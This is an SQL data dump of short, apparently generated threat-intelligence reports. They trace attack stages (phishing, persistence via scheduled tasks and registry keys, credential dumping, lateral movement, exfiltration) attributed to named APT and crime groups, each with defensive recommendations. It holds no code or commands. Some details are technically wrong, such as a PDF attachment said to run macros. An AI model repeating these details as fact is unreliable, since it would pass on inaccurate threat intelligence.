(566, 113, 1094, 1, 'Analysis of Network Traffic Patterns', '## Context on Suspicious Network Traffic\n\nFollowing the detection of suspicious network traffic, further analysis reveals a pattern consistent with initial access attempts by FIN7. The traffic originates from IP addresses known to be used by the group. The data packets show signs of reconnaissance activities, suggesting an attempt to identify vulnerable systems within the network.\n\n### Next Steps:\n- Monitor for unauthorized tool execution.\n- Implement enhanced network monitoring to capture any further anomalies.', '2026-01-28 00:05:11'),
(567, 113, 1095, 2, 'Identification of Unauthorized Tool Execution', '## Unauthorized Penetration Testing Tools Detected\n\nPost detection of unauthorized execution, our investigation confirms the use of legitimate penetration testing tools. These tools, often used by adversaries to blend in with legitimate security operations, indicate a strategic move towards executing payloads that could potentially interact with point-of-sale systems.\n\n### Insights:\n- Tools identified include Cobalt Strike and Metasploit.\n- Review of endpoint protection logs is critical to prevent persistence mechanisms from being established.', '2026-01-28 00:05:11'),
(568, 113, 1096, 3, 'Discovery of Persistence Mechanisms', '## Newly Created Scheduled Tasks Indicate Persistence\n\nSubsequent to the unauthorized execution alert, our systems have detected new scheduled tasks created on several endpoints. These tasks are configured to run payloads at specific intervals, ensuring continued access and operation within the compromised environment.\n\n### Recommendations:\n- Immediate review and removal of suspicious scheduled tasks.\n- Strengthen auditing of task creation and modification activities.', '2026-01-28 00:05:11'),
(569, 113, 1097, 4, 'Tracing Lateral Movement Activities', '## Lateral Movement via SMB Protocol\n\nUpon identifying scheduled tasks, analysis has revealed lateral movement through the SMB protocol. FIN7 appears to be exploiting SMB vulnerabilities to traverse the network, targeting other systems potentially housing sensitive data.\n\n### Action Items:\n- Restrict SMB traffic to essential systems only.\n- Conduct a thorough review of access logs to identify compromised credentials used in lateral movement.', '2026-01-28 00:05:11'),
(570, 113, 1098, 5, NULL, NULL, '2026-01-28 00:05:11'),
(571, 114, 1099, 1, 'Phishing Tactics and Techniques', '# Phishing Tactics and Techniques\n\n## Overview\nThe initial access vector utilized by the Silence Group involves a sophisticated phishing campaign. This campaign is characterized by:\n\n- **Targeted Emails:** Customized emails sent to bank employees with seemingly legitimate requests.\n- **Malicious Attachments:** Use of document files with embedded macros to deploy the initial payload.\n\n## Recommendations\n- **User Training:** Conduct awareness sessions to educate employees on phishing threats.\n- **Email Filtering:** Implement advanced email filtering systems to detect and block suspicious emails.', '2026-01-28 00:08:15'),
(572, 114, 1100, 2, 'Analysis of Suspicious PowerShell Activity', '# Analysis of Suspicious PowerShell Activity\n\n## Overview\nFollowing the initial phishing attack, suspicious PowerShell activity was detected. This activity is likely used for:\n\n- **Payload Execution:** Running scripts to download additional malware components.\n- **System Reconnaissance:** Gathering information about the infected system to plan further attacks.\n\n## Indicators\n- **Command Line Patterns:** Look for unusual encoded commands or remote script executions.\n- **Network Connections:** Monitor outbound connections initiated by PowerShell processes.\n\n## Recommendations\n- **Script Blocking:** Disable unnecessary PowerShell script execution on user machines.\n- **Logging:** Enable detailed logging for PowerShell activities.', '2026-01-28 00:08:15'),
(573, 114, 1101, 3, 'Scheduled Task Anomalies', '# Scheduled Task Anomalies\n\n## Overview\nThe Silence Group is employing unusual scheduled tasks as a persistence mechanism to maintain access on compromised systems.\n\n## Details\n- **Task Names:** Typically obscure or mimicking legitimate system tasks.\n- **Execution Frequency:** Regular intervals to ensure malware remains active.\n\n## Recommendations\n- **Audit Scheduled Tasks:** Regularly review and audit scheduled tasks on critical systems.\n- **Alert on Anomalies:** Set up alerts for the creation of new tasks that do not adhere to established naming conventions or execution patterns.', '2026-01-28 00:08:15'),
(574, 114, 1102, 4, 'Lateral Movement and Internal Server Compromise', '# Lateral Movement and Internal Server Compromise\n\n## Overview\nUnauthorized access to internal servers has been detected, indicating a successful lateral movement by the Silence Group through:\n\n- **Stolen Credentials:** Use of credentials obtained via previous phishing and reconnaissance efforts.\n- **Remote Desktop Protocol (RDP):** Exploiting RDP to spread malware to other network segments.\n\n## Indicators\n- **Login Anomalies:** Unusual login times and locations.\n- **RDP Access Patterns:** Increased or unexpected RDP sessions.\n\n## Recommendations\n- **Two-Factor Authentication:** Implement 2FA for all critical systems and remote access.\n- **Network Segmentation:** Isolate critical systems to limit lateral movement potential.', '2026-01-28 00:08:15'),
(575, 114, 1103, 5, NULL, NULL, '2026-01-28 00:08:15'),
(576, 115, 1104, 1, 'Assessment of Initial Access via Phishing', '### Contextual Overview\nFollowing the detection of a suspicious phishing email, analysis reveals that APT35 is employing advanced social engineering tactics to compromise targets within the aerospace and telecom sectors. The email contained a malicious link masquerading as an HR document, aiming to lure victims into credential theft.\n\n### Key Findings\n- **Phishing Techniques**: Utilized spear-phishing emails that exploit current events to increase legitimacy.\n- **Target Profile**: Primarily middle to high-level management positions, with access to sensitive data.\n\n### Recommendations\n- Immediate implementation of enhanced email filtering rules.\n- Conduct employee training sessions on recognizing phishing attempts.', '2026-01-28 00:08:43'),
(577, 115, 1105, 2, 'Magic Hound Malware Execution Analysis', '### Malware Behavior\nUpon execution, the Magic Hound malware demonstrated capabilities of extensive reconnaissance within the victim\'s network. It uses sophisticated methods to evade detection by traditional antivirus solutions.\n\n### Technical Insights\n- **Execution Pathway**: Delivered via a malicious link leading to a payload download.\n- **Evasion Tactics**: Employs obfuscation techniques to avoid detection.\n\n### Recommendations\n- Deploy advanced endpoint detection and response (EDR) solutions.\n- Conduct a network-wide scan for similar indicators of compromise (IoCs).', '2026-01-28 00:08:43'),
(578, 115, 1106, 3, 'Persistence Strategy Using Cloud Services', '### Persistence Mechanisms\nAPT35 has leveraged legitimate cloud services to maintain persistence within compromised networks. This approach allows threat actors to blend their activities with normal network traffic.\n\n### Observations\n- **Cloud Usage**: Utilizes cloud storage to host command-and-control (C2) infrastructure.\n- **Stealth Techniques**: Employs encrypted communications to obfuscate data transfers.\n\n### Recommendations\n- Audit cloud service configurations for unusual activities.\n- Establish regular reviews of access logs to detect anomalies.', '2026-01-28 00:08:43'),
(579, 115, 1107, 4, 'Lateral Movement and Data Exfiltration Tactics', '### Threat Analysis\nAPT35 has been observed using proprietary tools to facilitate lateral movement within networks, ultimately aiming to exfiltrate sensitive data.\n\n### Key Insights\n- **Movement Techniques**: Utilizes stolen credentials to move laterally across the network.\n- **Data Theft**: Exfiltrated data is compressed and encrypted before being sent to external servers.\n\n### Recommendations\n- Implement network segmentation to limit lateral movement.\n- Strengthen monitoring of outbound traffic for signs of data exfiltration.', '2026-01-28 00:08:43'),
(580, 115, 1108, 5, NULL, NULL, '2026-01-28 00:08:43'),
(581, 116, 1109, 1, 'Analysis of Phishing Email Tactics', '### Overview\nAfter the initial access was gained via a phishing email, our analysis focused on the tactics used in the phishing campaign.\n\n### Email Characteristics\n- **Sender Domain:** The email originated from a spoofed domain designed to mimic a legitimate Middle Eastern organization.\n- **Subject Line:** The subject line was crafted to elicit urgency, likely referencing recent regional developments.\n- **Attachments:** The email included a malicious PDF attachment, which, when opened, executed macros to download the initial stage of the Total Commander RAT.\n\n### Recommendations\n- **User Awareness Training:** Enhance phishing awareness training for employees, emphasizing recognition of spoofed domains and suspicious attachments.\n- **Email Filtering:** Implement advanced email filtering solutions to detect and quarantine potential phishing emails.', '2026-02-01 13:57:07'),
(582, 116, 1110, 2, 'Total Commander RAT Execution Analysis', '### Overview\nFollowing the execution of the Total Commander RAT, we conducted a forensic analysis to understand its operation within the compromised systems.\n\n### Execution Details\n- **Initial Payload:** The RAT was executed via a malicious macro embedded in the PDF from the phishing email.\n- **Execution Path:** The initial payload created a scheduled task to ensure the RAT\'s persistence.\n\n### Capabilities\n- **Remote Access:** The RAT allows attackers to remotely control the compromised system.\n- **Credential Harvesting:** It includes modules for capturing user credentials.\n\n### Recommendations\n- **Endpoint Protection:** Deploy robust endpoint detection and response solutions to identify and mitigate RAT activity.\n- **Macro Restrictions:** Consider disabling macros by default in office documents.', '2026-02-01 13:57:07'),
(583, 116, 1111, 3, 'Persistence Mechanisms via Scheduled Tasks', '### Overview\nPost malware execution, the attackers established persistence through scheduled tasks, allowing the Total Commander RAT to survive reboots.\n\n### Persistence Details\n- **Scheduled Tasks Creation:** The RAT created a scheduled task named \"Updater\" with hidden attributes, set to execute the RAT binary at startup.\n- **Registry Modifications:** Registry keys were modified to maintain a low footprint on the system.\n\n### Recommendations\n- **Task Monitoring:** Implement continuous monitoring and logging of scheduled tasks to detect unauthorized modifications.\n- **Registry Auditing:** Enable auditing of critical registry hives to detect unauthorized changes.', '2026-02-01 13:57:07'),
(584, 116, 1112, 4, 'Credential Access and Lateral Movement', '### Overview\nAfter persistence was established, attackers utilized stolen credentials to move laterally across the network.\n\n### Credential Acquisition\n- **Techniques Used:** The attackers leveraged the credential harvesting capabilities of the RAT to capture usernames and passwords.\n- **Credential Dumping Tools:** Tools such as Mimikatz were observed in use for credential dumping.\n\n### Lateral Movement\n- **Target Systems:** The attackers primarily targeted systems with administrative privileges and access to sensitive data.\n\n### Recommendations\n- **Credential Hygiene:** Enforce strong password policies and encourage regular password updates.\n- **Network Segmentation:** Limit access between network segments to reduce the impact of credential theft.', '2026-02-01 13:57:07'),
(585, 116, 1113, 5, NULL, NULL, '2026-02-01 13:57:07'),
(586, 117, 1114, 1, 'Analysis of Phishing Email Tactics', '### Overview\nThe phishing email detected, posing as a conference invitation, serves as an initial vector for APT35 to engage targets by exploiting their academic interests.\n\n### Key Findings\n- **Sender Analysis**: The email was sent from a domain closely resembling a legitimate academic conference, utilizing typosquatting techniques.\n- **Content Details**: The email content included legitimate conference themes and speaker lists, with minor errors indicating automated generation.\n\n### Recommendations\n- **Awareness Training**: Educate potential targets on recognizing such phishing attempts through workshops.\n- **Email Filtering**: Enhance email filtering rules to detect and quarantine similar phishing emails.', '2026-02-01 13:57:21'),
(587, 117, 1115, 2, 'Credential Harvesting Page Breakdown', '### Overview\nThe malicious link embedded in the phishing email redirects to a credential harvesting page designed to mimic legitimate conference registration sites.\n\n### Key Findings\n- **Page Design**: The page closely replicates the aesthetic and functionality of typical conference registration platforms, including fields for personal and institutional credentials.\n- **Technical Analysis**: Examination of the page\'s source code reveals the use of JavaScript to capture and exfiltrate input data to a remote server.\n\n### Recommendations\n- **Network Monitoring**: Implement monitoring for outbound connections to known malicious IPs and domains associated with APT35.\n- **Two-Factor Authentication**: Encourage the use of two-factor authentication for accessing sensitive academic resources.', '2026-02-01 13:57:21'),
(588, 117, 1116, 3, 'Credential Use and Persistence Efforts', '### Overview\nPost-credential harvesting, APT35 attempts to leverage stolen credentials to gain persistent access to targeted systems.\n\n### Key Findings\n- **Credential Use Patterns**: Analysis shows attempts to access email accounts and academic databases using harvested credentials.\n- **Persistence Techniques**: The adversaries employ automated scripts to repeatedly log in and maintain access, potentially setting up forwarding rules in compromised email accounts.\n\n### Recommendations\n- **Account Lockout Policies**: Implement stricter account lockout policies after multiple failed login attempts.\n- **Incident Response**: Conduct thorough incident response and forensic analysis to identify compromised accounts and mitigate further risks.', '2026-02-01 13:57:21'),
(589, 117, 1117, 4, NULL, NULL, '2026-02-01 13:57:21'),
(590, 118, 1118, 1, 'Initial Access: Software Installation Insights', '## Initial Access Analysis\n\n**Context:** The first alert in the operation was triggered by the detection of suspicious software installations on multiple endpoints within Russian financial institutions.\n\n**Findings:**\n- The software in question was identified to have been delivered via phishing emails containing malicious attachments.\n- The malware is confirmed to be a variant of the RTM Group\'s banking trojan, often disguised as legitimate financial software.\n- Indicators of compromise (IOCs) include unusual file hashes and registry changes linked to the trojan.\n\n**Next Steps:**\n- Monitor for any unusual script executions on affected workstations, which may signal further execution of the trojan.', '2026-02-01 13:57:41'),
(591, 118, 1119, 2, 'Execution Phase: Script Activity Analysis', '## Execution Analysis\n\n**Context:** Following the initial suspicious software installation, unusual script executions were detected on several workstations.\n\n**Findings:**\n- Scripts were executed using PowerShell, likely to establish communication with command-and-control (C2) servers.\n- The scripts were obfuscated, indicating a high level of sophistication typical of RTM Group operations.\n- Network traffic analysis shows connections to known malicious IP addresses linked with RTM Group.\n\n**Deeper Insight:**\n- These scripts are part of the trojan\'s payload delivery mechanism, aiming to download additional malicious modules.\n\n**Next Steps:**\n- Investigate persistent network anomalies that may indicate the establishment of a more permanent foothold in the network.', '2026-02-01 13:57:41'),
(592, 118, 1120, 3, NULL, NULL, '2026-02-01 13:57:41'),
(593, 119, 1121, 1, 'Macro Execution Analysis', '# Macro Execution Analysis\n\nFollowing the detection of the phishing email, the next stage in TA505\'s attack chain involves the execution of malicious macros embedded within a document. These macros are designed to extract and execute a payload that facilitates further compromise of the system.\n\n## Key Findings:\n- **Document Type**: The document was identified as a Microsoft Word file with embedded macros.\n- **Payload Delivery**: Once the document is opened, the macro downloads a secondary payload from a remote server.\n- **Obfuscation Techniques**: The macro code is heavily obfuscated to evade detection from signature-based defenses.\n\n## Recommendations:\n- Implement strict email filtering and attachment scanning policies.\n- Educate users on recognizing suspicious documents and avoiding macro-enabled files.', '2026-02-01 13:58:57'),
(594, 119, 1122, 2, 'Establishing Backdoor - TA505 Persistence', '# Establishing Backdoor - TA505 Persistence\n\nAfter the macro execution, TA505 aims to establish persistence within the network. This involves setting up a backdoor that allows continuous access.\n\n## Key Indicators:\n- **Registry Modifications**: Changes were detected in the Windows Registry to ensure the backdoor starts with the system.\n- **Scheduled Tasks**: New tasks were scheduled to run malicious scripts at regular intervals.\n- **Network Traffic**: Outbound connections to known TA505 command and control (C2) servers were observed.\n\n## Mitigation Strategies:\n- Regularly audit registry and scheduled tasks for unauthorized changes.\n- Monitor network traffic for anomalies and block known malicious IPs.', '2026-02-01 13:58:57'),
(595, 119, 1123, 3, 'Credential Dumping Investigated', '# Credential Dumping Investigated\n\nWith persistence ensured, TA505\'s next step involves credential dumping to facilitate lateral movement across the network.\n\n## Tools and Techniques:\n- **Mimikatz Usage**: Evidence of Mimikatz being used to extract credentials from memory.\n- **SAM and SYSTEM File Access**: Unauthorized access to SAM and SYSTEM files was detected.\n\n## Defensive Measures:\n- Employ endpoint detection and response (EDR) solutions to identify and alert on credential dumping activities.\n- Implement least privilege access and ensure sensitive accounts use multi-factor authentication.', '2026-02-01 13:58:57'),
(596, 119, 1124, 4, 'Data Exfiltration via Clop Ransomware', '# Data Exfiltration via Clop Ransomware\n\nThe final stage is the exfiltration of sensitive data using Clop ransomware, marking the culmination of TA505\'s operation.\n\n## Exfiltration Pathways:\n- **Encrypted Archives**: Data was compressed and encrypted before transfer to avoid detection.\n- **Outbound Channels**: Data exfiltration occurred via HTTP POST requests to remote servers controlled by TA505.\n\n## Prevention Steps:\n- Use data loss prevention (DLP) solutions to detect and block unauthorized data transfers.\n- Regularly backup critical data and maintain offline copies to mitigate ransomware effects.', '2026-02-01 13:58:57'),
(597, 119, 1125, 5, NULL, NULL, '2026-02-01 13:58:57'),
(598, 120, 1126, 1, 'Suspicious Network Activity Analysis', '### Overview\nFollowing the alert for suspicious network activity, analysis indicates potential initial access by the Winnti Group. Network logs reveal unusual traffic patterns consistent with known tactics used by this group.\n\n### Key Observations\n- **IP Anomalies:** Connections from IP ranges associated with previous Winnti campaigns.\n- **Protocol Misuse:** Abnormal use of HTTP/HTTPS protocols to access internal resources.\n- **Unrecognized User Agents:** User agents not corresponding to any known legitimate applications.\n\n### Recommendations\n- Implement stricter firewall rules to prevent unauthorized access.\n- Conduct a thorough review of access logs for compromised credentials.\n- Enhance monitoring of entry points to detect further anomalies.', '2026-02-01 14:01:29'),
(599, 120, 1127, 2, 'Malicious Code Execution Investigation', '### Overview\nAfter detecting malicious code execution, further investigation confirms the presence of a dropper used by the Winnti Group. This dropper is responsible for deploying additional payloads into the system.\n\n### Key Findings\n- **Execution Path:** Code executed via a compromised code-signing certificate from a trusted vendor.\n- **Payload Analysis:** The dropper has been identified as a variant of a known Winnti malware family.\n- **Execution Context:** The malicious code was executed under user contexts with elevated privileges, allowing deeper system penetration.\n\n### Recommendations\n- Revoke the compromised code-signing certificate and notify the vendor.\n- Deploy endpoint detection and response (EDR) tools to identify further malicious activities.\n- Conduct a forensic analysis of affected systems to assess the extent of the breach.', '2026-02-01 14:01:30'),
(600, 120, 1128, 3, 'Persistence Mechanism Discovery', '### Overview\nInvestigation into persistence mechanisms reveals that the Winnti Group has established footholds within the network. These mechanisms ensure their long-term presence and ability to execute further attacks.\n\n### Key Findings\n- **Registry Modifications:** Alterations in registry keys associated with startup processes.\n- **Service Creation:** New services created to launch malware at boot time.\n- **Scheduled Tasks:** Tasks scheduled to execute at regular intervals to maintain persistence.\n\n### Recommendations\n- Review and clean up unauthorized registry changes and services.\n- Monitor scheduled tasks for anomalies and disable suspicious ones.\n- Implement regular audits of system startup configurations.', '2026-02-01 14:01:30'),
(601, 120, 1129, 4, 'Lateral Movement and Data Exfiltration Risks', '### Overview\nLateral movement by the Winnti Group has been detected, indicating an attempt to access additional systems within the network. There is an imminent risk of data exfiltration if not mitigated.\n\n### Key Findings\n- **Credential Dumping:** Tools associated with credential harvesting detected on multiple systems.\n- **SMB Connections:** Increased SMB traffic hinting at reconnaissance and lateral movement.\n- **Potential Exfiltration Channels:** Encrypted traffic to external servers matching known command and control infrastructure.\n\n### Recommendations\n- Isolate compromised systems immediately to prevent further spread.\n- Conduct a full credential reset for all impacted users and systems.\n- Enhance network segmentation to limit lateral movement capabilities.', '2026-02-01 14:01:30'),
(602, 120, 1130, 5, NULL, NULL, '2026-02-01 14:01:30'),
(603, 121, 1131, 1, 'Analysis of Daserf Payload Delivery', '### Overview\nAfter detecting a suspicious email containing the Daserf payload, a deeper analysis was conducted to understand the delivery mechanisms employed by Tick APT.\n\n### Key Findings\n- **Phishing Tactics**: The email was designed to appear as a legitimate communication from a known defense contractor. It contained tailored language that aligns with typical business communication, increasing the likelihood of the recipient engaging.\n- **Attachment Analysis**: The attachment was a malicious document exploiting a zero-day vulnerability in popular document software, enabling the execution of the Daserf payload upon opening.\n\n### Recommendations\n- **Email Filtering**: Implement advanced email filtering solutions to detect and quarantine emails with similar characteristics.\n- **Employee Training**: Conduct regular training sessions to enhance awareness of phishing tactics and ensure that employees can identify suspicious emails.\n\n### Next Steps\nMonitoring for signs of malware execution is critical, as successful delivery often leads to system compromise.', '2026-02-01 14:01:53'),
(604, 121, 1132, 2, 'Daserf Backdoor Execution Analysis', '### Overview\nFollowing the execution of the Daserf backdoor, we conducted an in-depth analysis of the malware\'s behavior and its potential impact on the compromised systems.\n\n### Key Findings\n- **Execution Flow**: The Daserf backdoor establishes a secure communication channel with a command-and-control server located outside the targeted network.\n- **Capabilities**: It supports a range of functionalities, including system reconnaissance, data collection, and remote command execution.\n\n### Recommendations\n- **Network Monitoring**: Deploy network monitoring tools to identify unusual outbound traffic, which may indicate communication with external servers.\n- **Endpoint Protection**: Enhance endpoint security measures to prevent unauthorized execution of similar backdoors.\n\n### Next Steps\nFocus on identifying persistence mechanisms that may be employed by the malware to maintain access to the compromised systems.', '2026-02-01 14:01:53'),
(605, 121, 1133, 3, 'Persistence Mechanisms Analysis', '### Overview\nOur investigation has uncovered several persistence mechanisms utilized by the Daserf backdoor to ensure continued access within the infected network.\n\n### Key Findings\n- **Registry Modification**: The backdoor modifies critical registry keys to execute upon system startup.\n- **Scheduled Tasks**: It creates scheduled tasks that trigger the execution of malicious scripts at regular intervals.\n\n### Recommendations\n- **Registry Monitoring**: Implement continuous monitoring of registry modifications to detect unauthorized changes.\n- **Audit Scheduled Tasks**: Regularly audit scheduled tasks to ensure they have not been tampered with by malicious actors.\n\n### Next Steps\nAttention should be directed towards identifying and mitigating lateral movement, as the threat actor may attempt to expand their foothold within the network.', '2026-02-01 14:01:53'),
(606, 121, 1134, 4, 'Lateral Movement and Network Compromise', '### Overview\nFollowing the establishment of persistence, Tick APT has initiated lateral movement activities within the network, aiming to compromise additional systems.\n\n### Key Findings\n- **Credential Dumping**: The attackers are using credential dumping tools to harvest administrative credentials.\n- **Remote Execution**: Compromised credentials are being used to execute commands on other systems within the network.\n\n### Recommendations\n- **Identity Management**: Strengthen identity management practices, including the use of multi-factor authentication to protect sensitive accounts.\n- **Network Segmentation**: Implement network segmentation to limit the ability of attackers to move laterally.\n\n### Next Steps\nFurther investigation is required to detect and prevent any data exfiltration attempts that may follow the lateral movement phase.', '2026-02-01 14:01:53'),
(607, 121, 1135, 5, NULL, NULL, '2026-02-01 14:01:53'),
(608, 122, 1136, 1, 'Analysis of Suspicious Blog Activity', '### Context\nThe initial alert highlighted unusual activity on a blog suspected to be part of a command-and-control (C2) infrastructure leveraged by Blackgear. This blog is likely being used to facilitate communication with infected hosts.\n\n### Insight\nOur analysis revealed that the blog is updated with encoded commands which are retrieved by compromised systems. This suggests a sophisticated method of indirect communication intended to evade traditional detection mechanisms.\n\n### Next Steps\nContinue monitoring the blog for any new updates that correspond with Protux activity, as this can provide insight into the attacker\'s next moves.', '2026-02-01 14:02:14'),
(609, 122, 1137, 2, 'Protux Backdoor Analysis', '### Context\nFollowing the detection of Protux backdoor execution attempts, further investigation is warranted to understand the extent of the compromise.\n\n### Insight\nProtux is a sophisticated malware that allows attackers to execute commands remotely, gather system information, and maintain access to the infected host. Its execution suggests that the attackers are moving beyond reconnaissance to active exploitation.\n\n### Next Steps\nFocus on identifying the persistence mechanisms used by Protux to determine how it maintains access across reboots and system updates.', '2026-02-01 14:02:14'),
(610, 122, 1138, 3, 'Identifying Protux Persistence Mechanisms', '### Context\nHaving identified attempts to execute the Protux backdoor, it\'s crucial to understand how it remains on the system post-reboot.\n\n### Insight\nProtux employs several persistence techniques, including registry modifications and scheduled tasks. These methods ensure that the malware is reloaded each time the system starts, making it difficult to remove.\n\n### Next Steps\nPrepare to counteract these persistence mechanisms by developing scripts for automated detection and removal. Simultaneously, anticipate potential lateral movement activities by monitoring for unusual credential use.', '2026-02-01 14:02:14'),
(611, 122, 1139, 4, 'Credential Dumping and Lateral Movement', '### Context\nWith persistence mechanisms in place, Blackgear operatives have been observed attempting lateral movement within the network through credential dumping.\n\n### Insight\nThe attackers are using tools to extract cached credentials, enabling them to move laterally and access additional systems. This stage is critical as it often precedes data exfiltration.\n\n### Next Steps\nEnhance monitoring on critical systems for unauthorized access attempts and prepare to mitigate potential data exfiltration by securing sensitive data and monitoring outbound network traffic.', '2026-02-01 14:02:14'),
(612, 122, 1140, 5, NULL, NULL, '2026-02-01 14:02:14'),
(613, 123, 1141, 1, 'Spear Phishing Campaign Analysis', '### Overview\nFollowing **Alert 1** regarding the initial access through spear phishing, this report delves into the tactics used by Patchwork to infiltrate targets.\n\n### Key Findings\n- **Target Selection**: Patchwork has focused on high-ranking officers within Pakistan\'s military, using personal and military-related topics to gain trust.\n- **Email Composition**: The emails are crafted with a high degree of personalization, leveraging publicly available information from social media.\n- **Attachments and Links**: Malicious documents and links are embedded, often disguised as official military communications.\n\n### Next Steps\nPrepare for potential **Malware Execution** as the documents are designed to deploy backdoor access upon opening.', '2026-02-01 14:02:29'),
(614, 123, 1142, 2, 'Backdoor Deployment and Execution', '### Overview\nIn response to **Alert 2**, this report provides insights into how Patchwork executes malicious documents to open backdoors.\n\n### Key Findings\n- **Malware Family**: The documents deploy a variant of a known malware family, adapted with code recycling techniques.\n- **Execution Trigger**: Activation occurs upon opening the document, utilizing macros or embedded scripts.\n- **Initial Payload**: A lightweight downloader fetches the full backdoor components from a remote server.\n\n### Next Steps\nMonitor systems for any **Persistence Mechanisms**, particularly registry modifications that keep the backdoor active.', '2026-02-01 14:02:29'),
(615, 123, 1143, 3, 'Persistence Techniques and Registry Modifications', '### Overview\nThis report, following **Alert 3**, investigates how Patchwork ensures persistence on compromised systems.\n\n### Key Findings\n- **Registry Alterations**: Modifications are made to the Windows Registry, ensuring the malware executes on startup.\n- **Scheduled Tasks**: In some instances, tasks are created to periodically re-launch the malware.\n- **Obfuscation Methods**: Techniques are employed to disguise these changes from standard detection tools.\n\n### Next Steps\nFocus on identifying **Credential Access** attempts, as persistent access is often followed by lateral movements within the network.', '2026-02-01 14:02:29'),
(616, 123, 1144, 4, 'Credential Access and Lateral Movement', '### Overview\nThis report explores the tactics used by Patchwork to move laterally within the network, as observed in **Alert 4**.\n\n### Key Findings\n- **Credential Dumping**: Tools such as Mimikatz are utilized to extract passwords and authentication tokens.\n- **Network Mapping**: Compromised credentials are used to explore the network topology and locate valuable targets.\n- **Access Escalation**: Attempts to escalate privileges are noted, aiming to gain broader access.\n\n### Next Steps\nPrepare for potential **Data Exfiltration** activities as Patchwork is likely to compress and exfiltrate sensitive data.', '2026-02-01 14:02:29'),
(617, 123, 1145, 5, NULL, NULL, '2026-02-01 14:02:29'),
(618, 124, 1146, 1, 'Deeper Insight into Spear Phishing Campaign', '## Overview\nThe spear phishing campaign initiated by the Sidewinder APT group specifically targeted high-ranking officials within the military and government sectors in Pakistan and China. The emails were crafted to appear as official communications, incorporating language and references relevant to ongoing military operations and strategic planning.\n\n## Technical Analysis\n- **Email Subject Lines:** Common subjects included \'Urgent Security Updates\', \'Strategic Meeting Notice\', and \'Confidential Briefing Report\'.\n- **Attachment Types:** The emails frequently contained malicious attachments disguised as PDF or Word documents. Once opened, these attachments deployed a payload utilizing document macros and exploit kits.\n\n## Implications\nThe success of this spear phishing campaign could potentially lead to unauthorized access to sensitive military information, thereby compromising national security in the targeted regions.\n\n## Recommendations\n- **User Training:** Enhance user awareness and training to identify phishing attempts.\n- **Email Filtering:** Implement advanced email filtering solutions to detect and block phishing emails.\n\nThis report sets the stage for the subsequent phase of the operation, where malware execution via exploit will be analyzed.', '2026-02-07 21:12:17'),
(619, 124, 1147, 2, 'Analysis of Malware Execution via Exploit', '## Incident Summary\nFollowing the spear phishing attack, Sidewinder APT successfully executed malware on compromised systems using a combination of document exploits and vulnerability exploitation.\n\n## Technical Details\n- **Exploited Vulnerabilities:** The group leveraged known vulnerabilities in outdated software, particularly focusing on CVEs related to document processing applications.\n- **Payload Features:** The malware payload was designed to establish backdoor access, enabling remote command execution and data exfiltration.\n\n## Observations\nThe malware demonstrated advanced persistence techniques, including registry modification and scheduled tasks, to maintain presence on the infected systems.\n\n## Countermeasures\n- **Patch Management:** Ensure systems are regularly updated and patched against known vulnerabilities.\n- **Endpoint Protection:** Deploy advanced endpoint protection solutions capable of detecting exploit behaviors.\n\nThe successful execution of the malware sets the stage for establishing C2 communication, which will be detailed in the next phase of this operation.', '2026-02-07 21:12:17'),
(620, 124, 1148, 3, NULL, NULL, '2026-02-07 21:12:17'),
(621, 125, 1149, 1, 'Analysis of Phishing Tactics Used by APT36', '## Overview\nAPT36, also known as Transparent Tribe, is known for targeting Indian military and defense sectors. The group often uses spear-phishing campaigns to deliver malware payloads, such as Crimson RAT.\n\n## Key Indicators\n- **Email Subjects:** Often related to military events or updates.\n- **Sender Profiles:** Spoofed or compromised email addresses mimicking official entities.\n- **Attachments:** Typically Word documents with embedded malicious macros.\n\n## Next Steps\nProceed to analyze potential malware execution through attachments and links embedded in these emails, which may lead to the deployment of Crimson RAT.', '2026-02-07 21:13:34'),
(622, 125, 1150, 2, 'Crimson RAT Execution and Initial Infection Vector', '## Overview\nUpon execution, Crimson RAT establishes a foothold on the victim\'s system. This Remote Access Trojan is capable of keylogging, screen capturing, and executing commands remotely.\n\n## Execution Details\n- **Initial Vector:** Often delivered via malicious email attachments.\n- **Execution Environment:** Typically targets Windows-based systems.\n- **Capabilities:** Remote command execution, file exfiltration, and surveillance.\n\n## Next Steps\nMonitor the system for persistence mechanisms that Crimson RAT may deploy to maintain access and understand the strategies used to evade detection.', '2026-02-07 21:13:34'),
(623, 125, 1151, 3, 'Persistence Mechanisms of Crimson RAT', '## Overview\nOnce executed, Crimson RAT aims to establish persistence on the target system, ensuring continued access even after reboots or user logouts.\n\n## Techniques Observed\n- **Registry Modifications:** Alters registry keys to execute upon startup.\n- **Scheduled Tasks:** Creates tasks to maintain execution at specified intervals.\n- **Service Creation:** Installs as a service to run with system privileges.\n\n## Next Steps\nInvestigate any lateral movement within the network to identify other compromised systems and understand the full extent of APT36\'s infiltration.', '2026-02-07 21:13:34'),
(624, 125, 1152, 4, 'Lateral Movement and Internal Network Reconnaissance', '## Overview\nAfter establishing persistence, APT36 often conducts lateral movement to explore the internal network, aiming to discover and compromise additional assets.\n\n## Techniques Observed\n- **Credential Dumping:** Uses tools to harvest credentials and access other systems.\n- **Network Scanning:** Identifies live hosts, open ports, and vulnerable services.\n- **SMB/Windows Admin Shares:** Utilizes existing network shares to move laterally.\n\n## Next Steps\nFocus on monitoring for any signs of data exfiltration as APT36 may attempt to collect and send sensitive information outside the network.', '2026-02-07 21:13:34'),
(625, 125, 1153, 5, NULL, NULL, '2026-02-07 21:13:34'),
(626, 126, 1154, 1, 'Analysis of Spear Phishing Techniques', '### Overview\nThe Donot Team has initiated a sophisticated spear phishing campaign targeting key officials within South Asian governments. The emails are crafted to appear as legitimate communications from trusted internal departments.\n\n### Techniques Used\n- **Email Spoofing**: Attackers have successfully spoofed official government email addresses.\n- **Social Engineering**: Emails contain urgent requests or topics of interest tailored to the recipient\'s role.\n\n### Recommendations\n- Implement strict email filtering and verification protocols.\n- Conduct awareness training to recognize phishing attempts.', '2026-02-07 21:13:37'),
(627, 126, 1155, 2, 'Detection of Malicious Application Execution', '### Incident Summary\nFollowing the spear phishing attack, users unknowingly executed a malicious Android application embedded within the email attachments. This application posed as a legitimate document viewer.\n\n### Technical Details\n- **Application Permissions**: The application requests extensive permissions, including access to contacts, SMS, and storage.\n- **Execution Triggers**: The application is designed to execute upon opening by exploiting known vulnerabilities in outdated Android versions.\n\n### Mitigation Steps\n- Advise users to update Android devices to the latest security patches.\n- Block execution of applications from unknown sources.', '2026-02-07 21:13:37'),
